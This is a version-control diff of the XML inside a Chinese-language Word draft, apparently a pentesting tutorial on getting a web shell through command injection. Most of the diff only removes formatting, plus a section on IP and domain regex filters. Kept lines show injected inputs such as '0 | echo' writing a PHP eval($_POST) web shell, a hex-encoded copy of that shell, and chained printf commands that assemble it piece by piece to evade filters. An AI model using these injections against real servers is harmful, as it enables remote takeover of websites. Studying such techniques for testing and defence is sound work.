--- a/web/草稿箱/命令行执行拿webshell.docx
+++ b/web/草稿箱/命令行执行拿webshell.docx
@@ -6,9 +6,6 @@
       <w:pPr>
         <w:pStyle w:val="1"/>
         <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -24,11 +21,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -61,11 +53,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -117,19 +104,8 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+    <w:p/>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -156,11 +132,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -169,11 +140,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -226,11 +192,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -245,11 +206,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -303,11 +259,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -329,11 +280,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -386,21 +332,11 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:t>0 | echo "&lt;?php eval($_POST['x']);?&gt;"</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:t xml:space="preserve">0 | </w:t>
       </w:r>
@@ -409,11 +345,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -475,19 +406,8 @@
         <w:t>&gt;\n"</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+    <w:p/>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -508,11 +428,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -566,21 +481,11 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:t>\x3c\x3f\x70\x68\x70\x20\x65\x76\x61\x6c\x28\x24\x5f\x50\x4f\x53\x54\x5b\x27\x78\x27\x5d\x29\x3b\x3f\x3e</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -601,11 +506,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -637,19 +537,8 @@
         <w:t>导致无法执行</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+    <w:p/>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -658,21 +547,11 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:t>0 |  printf "&lt;"  &gt; a.php</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:t>0 |  printf "</w:t>
       </w:r>
@@ -696,11 +575,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -709,22 +583,12 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>0 |  printf "eval" &gt;&gt; a.php</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -733,11 +597,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -746,11 +605,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -759,11 +613,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -772,11 +621,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -785,11 +629,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -798,11 +637,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -811,11 +645,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -824,11 +653,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -836,19 +660,8 @@
         <w:t>0 |  printf "&gt;" &gt;&gt; a.php</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+    <w:p/>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -869,11 +682,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -926,11 +734,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -939,11 +742,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -997,11 +795,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -1010,11 +803,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -1066,299 +854,6 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>如果</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>对输入的</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>IP</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>使用了正则表达式过滤，比如这样</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>/^(?=^.{3,255}$)[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-z</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>A-Z0-9][-a-zA-Z0-9]{0,62})+$/   #</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>匹配域名</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:t>^([a-zA-Z0-9]+\.)*([a-zA-Z0-9]+\.)([a-zA-Z]+)$</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>#</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>匹配域名</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>/^([1-9]{1,3})\.([0-9]{1,3})\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>.([0-9]{1,3})\.([1,9]{1,3})$/                         #</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>匹配</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>IP</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>地址</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5274310" cy="2826618"/>
-            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
-            <wp:docPr id="43" name="图片 43"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 43"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5274310" cy="2826618"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5274310" cy="1451482"/>
-            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
-            <wp:docPr id="46" name="图片 46"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 46"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5274310" cy="1451482"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/>
@@ -1563,6 +1058,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="a">
     <w:name w:val="Normal"/>
     <w:qFormat/>
+    <w:rsid w:val="007C1DC1"/>
     <w:pPr>
       <w:widowControl w:val="0"/>
       <w:jc w:val="both"/>
